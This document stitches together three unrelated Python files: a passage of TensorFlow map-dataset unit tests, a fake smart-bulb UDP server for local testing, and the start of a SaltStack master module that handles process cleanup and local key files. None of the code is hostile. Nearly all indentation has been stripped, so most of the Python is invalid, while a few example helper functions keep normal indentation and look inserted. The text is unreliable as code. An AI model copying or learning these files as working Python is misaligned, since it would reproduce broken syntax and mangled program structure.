"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message"), num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message"),
num_threads=2,
output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message")).prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message")).apply(
error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message"),
num_threads=2,
output_buffer_size=2).apply(error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (
contrib_dataset_ops.Dataset.from_tensor_slices(filenames).map(
io_ops.read_file, num_threads=2, output_buffer_size=2).apply(
error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = contrib_dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1)).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1)).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.NotFoundError):
sess.run(get_next)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (
contrib_dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (contrib_dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = contrib_dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = contrib_dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = dataset_tuple.make_one_shot_iterator().get_next()
next_namedtuple = dataset_namedtuple.make_one_shot_iterator().get_next()
# make sure both datasets contain the same data
with self.test_session() as sess:
for i in range(count):
tuple_, namedtuple_ = sess.run([next_tuple, next_namedtuple])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_namedtuple)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
contrib_dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
contrib_dataset_ops.Dataset.range(100).map(_map_fn)
.prefetch(buffer_size_placeholder).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (
contrib_dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (
contrib_dataset_ops.Dataset.range(10).map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def assertSparseValuesEqual(self, a, b):
self.assertAllEqual(a.indices, b.indices)
self.assertAllEqual(a.values, b.values)
self.assertAllEqual(a.dense_shape, b.dense_shape)
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
iterator = (
contrib_dataset_ops.Dataset.range(10).map(_sparse)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _sparse(i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
iterator = (
contrib_dataset_ops.Dataset.range(10).map(_sparse).map(_check)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _check(_sparse(i)).eval())
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureResourceInMapFn(self):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return contrib_dataset_ops.Dataset.range(10).map(_map_fn)
def _build_graph():
captured_iterator = contrib_dataset_ops.Dataset.range(
10).make_initializable_iterator()
ds = _build_ds(captured_iterator)
iterator = ds.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
return captured_iterator.initializer, init_op, get_next
with ops.Graph().as_default() as g:
captured_init_op, init_op, get_next = _build_graph()
with self.test_session(graph=g) as sess:
sess.run(captured_init_op)
sess.run(init_op)
for i in range(10):
self.assertEquals(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
class MapDatasetSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def setUp(self):
self._tensor_slice_len = 7
self._num_epochs = 14
self._num_outputs = self._tensor_slice_len * self._num_epochs
def _build_ds(self, multiplier=37.0):
components = (np.arange(self._tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(self._tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(self._tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (
contrib_dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(self._num_epochs))
def testSaveRestoreCore(self):
self.run_core_tests(
self._build_ds,
lambda: self._build_ds(multiplier=15.0),
self._num_outputs)
def testSaveStatefulFunction(self):
def _build_ds():
def _map_fn(x):
return random_ops.random_uniform(
(), 0, 10, dtype=dtypes.int32) * math_ops.to_int32(x)
return contrib_dataset_ops.Dataset.range(100).map(_map_fn)
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureVariableInMapFn(self):
def _build_ds():
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return (contrib_dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: counter_var.assign_add(1)))
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureConstantInMapFn(self):
def _build_ds():
constant_var = constant_op.constant(5)
return (contrib_dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda x: x + constant_var))
self.run_core_tests(_build_ds, None, 10)
def testCaptureDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return contrib_dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
def testBuildDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
@function.Defun(dtypes.int32)
def defun_fn_deep(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return constant_op.constant(11000) + defun_fn_deep(math_ops.to_int32(x))
return contrib_dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
class ParallelMapDatasetSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def setUp(self):
self._tensor_slice_len = 7
self._num_epochs = 1
self._num_outputs = self._tensor_slice_len * self._num_epochs
def _build_ds(self, multiplier=37.0):
components = (np.arange(self._tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(self._tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(self._tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_parallel_calls=3).repeat(self._num_epochs))
def _build_ds_with_prefetch(self, multiplier=37.0):
components = (np.arange(self._tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(self._tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(self._tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_parallel_calls=3).repeat(self._num_epochs).prefetch(5))
def testSaveRestoreCore(self):
for ds_fn in [self._build_ds, self._build_ds_with_prefetch]:
self.run_core_tests(
ds_fn,
lambda: ds_fn(multiplier=15.0),
self._num_outputs)
def testSaveStatefulFunction(self):
def _build_ds():
def _map_fn(x):
return random_ops.random_uniform(
(), 0, 10, dtype=dtypes.int32) * math_ops.to_int32(x)
return contrib_dataset_ops.Dataset.range(100).map(_map_fn)
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureVariableInMapFn(self):
def _build_ds():
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return (contrib_dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: counter_var.assign_add(1)))
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureConstantInMapFn(self):
def _build_ds():
constant_var = constant_op.constant(5)
return (contrib_dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda x: x + constant_var))
self.run_core_tests(_build_ds, None, 10)
def testCaptureDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return contrib_dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
def testBuildDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
@function.Defun(dtypes.int32)
def defun_fn_deep(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return constant_op.constant(11000) + defun_fn_deep(math_ops.to_int32(x))
return contrib_dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
class IgnoreErrorsSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_ds(self, components):
return contrib_dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message")).apply(
error_ops.ignore_errors())
def testIgnoreErrorsCore(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
diff_components = np.array([1., 2., 3., np.nan]).astype(np.float32)
num_outputs = 4
self.run_core_tests(lambda: self._build_ds(components),
lambda: self._build_ds(diff_components), num_outputs)
if __name__ == "__main__":
test.main()
|
fake_bulb.py
|
"""Start up a fake bulb to test features without a real bulb."""
import json
import socketserver
import threading
from typing import Any, Callable, Dict
def get_initial_pilot() -> Dict[str, Any]:
return {
"method": "getPilot",
"env": "pro",
"result": {
"mac": "ABCABCABCABC",
"rssi": -62,
"src": "",
"state": False,
"sceneId": 0,
"r": 255,
"g": 127,
"b": 0,
"c": 0,
"w": 0,
"temp": 0,
"dimming": 13,
},
}
def get_initial_sys_config() -> Dict[str, Any]:
return {
"method": "getSystemConfig",
"env": "pro",
"result": {
"mac": "a8bb5006033d",
"homeId": 653906,
"roomId": 989983,
"moduleName": "",
"fwVersion": "1.21.0",
"groupId": 0,
"drvConf": [20, 2],
"ewf": [255, 0, 255, 255, 0, 0, 0],
"ewfHex": "ff00ffff000000",
"ping": 0,
},
}
def get_initial_model_config() -> Dict[str, Any]:
return {
"method": "getModelConfig",
"env": "pro",
"result": {
"ps": 1,
"pwmFreq": 1000,
"pwmRange": [3, 100],
"wcr": 30,
"nowc": 1,
"cctRange": [2200, 2700, 4800, 6500],
"renderFactor": [171, 255, 75, 255, 43, 85, 0, 0, 0, 0],
},
}
BULB_JSON_ERROR = b'{"env":"pro","error":{"code":-32700,"message":"Parse error"}}'
class BulbUDPRequestHandlerBase(socketserver.DatagramRequestHandler):
"""Class for UDP handler."""
pilot_state: Dict[str, Any] # Will be set by constructor for the actual class
sys_config: Dict[str, Any] # Will be set by constructor for the actual class
model_config: Dict[str, Any] # Will be set by constructor for the actual class
def handle(self) -> None:
"""Handle the request."""
data = self.rfile.readline().strip()
print(f"Request:{data!r}")
try:
json_data: Dict[str, Any] = dict(json.loads(data.decode()))
except json.JSONDecodeError:
self.wfile.write(BULB_JSON_ERROR)
return
method = str(json_data["method"])
if method == "setPilot":
return_data = self.setPilot(json_data)
self.wfile.write(return_data)
elif method == "getPilot":
print(f"Response:{json.dumps(self.pilot_state)!r}")
self.wfile.write(bytes(json.dumps(self.pilot_state), "utf-8"))
elif method == "getSystemConfig":
self.wfile.write(bytes(json.dumps(self.sys_config), "utf-8"))
elif method == "getModelConfig":
self.wfile.write(bytes(json.dumps(self.model_config), "utf-8"))
else:
raise RuntimeError(f"No handler for {method}")
def setPilot(self, json_data: Dict[str, Any]) -> bytes:
"""Change the values in the state."""
for name, value in json_data["params"].items():
self.pilot_state["result"][name] = value
return b'{"method":"setPilot","env":"pro","result":{"success":true}}'
def make_udp_fake_bulb_server(module_name: str) -> socketserver.ThreadingUDPServer:
"""Configure a fake bulb instance."""
pilot_state = get_initial_pilot()
sys_config = get_initial_sys_config()
model_config = get_initial_model_config()
sys_config["result"]["moduleName"] = module_name
BulbUDPRequestHandler = type(
"BulbUDPRequestHandler",
(BulbUDPRequestHandlerBase,),
{
"pilot_state": pilot_state,
"sys_config": sys_config,
"model_config": model_config,
},
)
udp_server = socketserver.ThreadingUDPServer(
server_address=("127.0.0.1", 38899),
RequestHandlerClass=BulbUDPRequestHandler,
)
return udp_server
def startup_bulb(module_name: str = "ESP01_SHRGB_03") -> Callable[[], Any]:
"""Start up the bulb. Returns a function to shut it down."""
server = make_udp_fake_bulb_server(module_name)
thread = threading.Thread(target=server.serve_forever)
thread.start()
return server.shutdown
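# Hedged sketch (not part of the test helper's API): start the fake bulb, send
# a getPilot request over UDP to the hard-coded 127.0.0.1:38899, and return the
# decoded reply.
def _example_query_fake_bulb():
    import socket

    shutdown = startup_bulb()
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.settimeout(2)
            sock.sendto(b'{"method":"getPilot","params":{}}', ("127.0.0.1", 38899))
            reply, _ = sock.recvfrom(4096)
        return json.loads(reply.decode())
    finally:
        shutdown()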
|
master.py
|
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
import os
import re
import time
import errno
import fnmatch
import signal
import shutil
import stat
import logging
import hashlib
import datetime
import pwd
import getpass
import resource
import subprocess
import multiprocessing
# Import third party libs
import zmq
import yaml
from M2Crypto import RSA
# Import salt libs
import salt.crypt
import salt.utils
import salt.client
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.search
import salt.utils
import salt.fileserver
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.verify
import salt.utils.minions
import salt.utils.gzip_util
from salt.utils.debug import enable_sigusr1_handler
from salt.exceptions import SaltMasterError
log = logging.getLogger(__name__)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(('Process did not die with terminate(): {0}'
.format(proc.pid)))
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
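# A minimal sketch (not part of the original module) of how clean_proc() is
# meant to be used on a master sub-process; the sleeping target and the
# wait_for_kill value below are illustrative only.
def _example_clean_proc():
    proc = multiprocessing.Process(target=time.sleep, args=(3600,))
    proc.start()
    # terminate() is retried every 0.1 seconds; once wait_for_kill attempts
    # have passed, the process is killed outright with SIGKILL.
    clean_proc(proc, wait_for_kill=5)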
class MasterExit(SystemExit):
'''
Named exit exception for the master process exiting
'''
pass
class SMaster(object):
'''
Create a simple salt-master, this will generate the top level master
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
self.crypticle = self.__prep_crypticle()
def __prep_crypticle(self):
'''
Return the crypticle used for AES
'''
return salt.crypt.Crypticle(self.opts, self.opts['aes'])
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
users = []
keys = {}
acl_users = set(self.opts['client_acl'].keys())
if self.opts.get('user'):
acl_users.add(self.opts['user'])
acl_users.add(getpass.getuser())
for user in pwd.getpwall():
users.append(user.pw_name)
for user in acl_users:
log.info(
'Preparing the {0} key for local communication'.format(
user
)
)
cumask = os.umask(191)
if not user in users:
log.error('ACL user {0} is not available'.format(user))
continue
keyfile = os.path.join(
self.opts['cachedir'], '.{0}_key'.format(user)
)
if os.path.exists(keyfile):
log.debug('Removing stale keyfile: {0}'.format(keyfile))
os.unlink(keyfile)
key = salt.crypt.Crypticle.generate_key_string()
with salt.utils.fopen(keyfile, 'w+') as fp_:
fp_.write(key)
os.umask(cumask)
os.chmod(keyfile, 256)
try:
os.chown(keyfile, pwd.getpwnam(user).pw_uid, -1)
except OSError:
# The master is not being run as root and can therefore not
# chown the key file
pass
keys[user] = key
return keys
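# A minimal sketch (not part of the original module): how a client-side caller
# could read back the per-user key that SMaster.__prep_key() drops into the
# cachedir; the default cachedir path below is an illustrative assumption.
def _example_read_local_key(cachedir='/var/cache/salt/master'):
    keyfile = os.path.join(cachedir, '.{0}_key'.format(getpass.getuser()))
    # The keyfile is written with mode 0400 and chowned to the user, so only
    # that user (or root) can read it.
    with open(keyfile, 'r') as fp_:
        return fp_.read()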
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
SMaster.__init__(self, opts)
def _clear_old_jobs(self):
'''
The clean old jobs function is the general passive maintenance process
controller for the Salt master. This is where any data that needs to be
periodically cleaned up on the master is maintained.
'''
